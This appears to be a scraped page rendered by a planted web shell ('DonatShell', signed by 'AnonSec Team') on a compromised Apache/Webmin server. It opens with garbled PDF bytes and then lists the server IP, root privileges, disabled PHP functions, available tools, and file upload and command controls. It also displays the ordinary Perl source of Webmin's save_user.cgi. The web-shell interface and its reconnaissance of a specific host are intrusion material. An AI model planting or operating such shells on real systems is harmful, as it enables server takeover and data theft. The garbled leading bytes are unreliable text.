%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 49.231.201.246  /  Your IP : 216.73.216.149
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : root ( 0)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/thread-self/root/usr/share/webmin/htaccess-htpasswd/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /proc/thread-self/root/usr/share/webmin/htaccess-htpasswd/save_user.cgi
#!/usr/bin/perl
# save_user.cgi
# Create, update or delete a password file user

require './htaccess-lib.pl';
&ReadParse();
&error_setup($text{'save_err'});
@dirs = &list_directories();
($dir) = grep { $_->[0] eq $in{'dir'} } @dirs;
&can_access_dir($dir->[0]) || &error($text{'dir_ecannot'});
&lock_file($dir->[1]);

&switch_user();
$users = $dir->[2] == 3 ? &list_digest_users($dir->[1])
			: &list_users($dir->[1]);
if (!$in{'new'}) {
	$user = $users->[$in{'idx'}];
	$loguser = $user->{'user'};
	}
else {
	$loguser = $in{'htuser'};
	}

if ($in{'delete'}) {
	# Just delete this user
	&delete_user($user);
	}
else {
	# Validate inputs
	$in{'htuser'} || &error($text{'save_euser1'});
	$in{'htuser'} =~ /:/ && &error($text{'save_euser2'});
	if ($in{'new'} || $user->{'user'} ne $in{'htuser'}) {
		($clash) = grep { $_->{'user'} eq $in{'htuser'} } @$users;
		$clash && &error($text{'save_eclash'});
		}
	!$in{'htpass_def'} && $in{'htpass'} =~ /:/ &&
		&error($text{'save_epass'});

	# Actually save
	$user->{'user'} = $in{'htuser'};
	if (!$in{'htpass_def'}) {
		if ($dir->[2] == 3) {
			$user->{'pass'} = &digest_password($in{'htuser'},
					$in{'dom'}, $in{'htpass'});
			}
		else {
			$user->{'pass'} = &encrypt_password(
					$in{'htpass'}, undef, $dir->[2]);
			}
		}
	$user->{'enabled'} = $in{'enabled'};
	if ($dir->[2] == 3) {
		$in{'dom'} =~ /^\S+$/ && $in{'dom'} !~ /:/ ||
			&error($text{'save_edom'});
		$user->{'dom'} = $in{'dom'};
		$user->{'digest'} = 1;
		}
	if ($in{'new'}) {
		&create_user($user, $dir->[1]);
		}
	else {
		&modify_user($user);
		}
	}
&switch_back();

&unlock_file($dir->[1]);
&webmin_log($in{'delete'} ? "delete" : $in{'new'} ? "create" : "modify",
	    "user", $loguser, $user);
&redirect("");


Anon7 - 2022
AnonSec Team